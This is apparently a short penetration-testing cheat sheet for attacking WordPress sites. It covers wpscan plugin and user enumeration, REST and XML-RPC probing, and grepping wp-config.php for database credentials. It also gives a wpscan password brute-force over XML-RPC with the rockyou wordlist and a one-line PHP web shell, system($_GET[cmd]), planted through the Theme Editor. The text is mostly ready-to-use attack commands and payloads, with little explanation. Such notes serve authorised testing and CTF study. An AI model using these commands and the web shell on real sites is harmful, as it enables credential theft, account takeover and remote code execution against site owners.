WordPress

WordPress Enumeration

Wordpress | HackTricks

WP Scan

Scan all plugins:

wpscan --url http://<ip> --enumerate ap --plugins-detection aggressive --api-token <api-token> -v

[!important] Always do full scans on plugins as many of them are vulnerable.

WP-JSON

User Info:

/wp-json/wp/v2/users
/wp-json/oembed/1.0/embed?url=POST-URL

Page Info:

/wp-json/wp/v2/pages

XML-RPC

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

wp-config.php

Hunting for Credentials:

If we can read the wp-config.php file, it is possible to look for SQL database credentials:

cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'

  • Useful in Arbitrary File Read, or Privilege Escalation

Attacking

Login Bruteforce:

sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P /usr/share/wordlists/rockyou.txt --url http://<url>

Code Execution:

Requires Admin access. Inject this into a theme in Theme Editor:

system($_GET[cmd]);

  • Then visit the php page with ?cmd=<command>

Known Vulnerabilities:

  • Vulnerable Plugins - mail-masta

  • Vulnerable Plugins - wpDiscuz

Last updated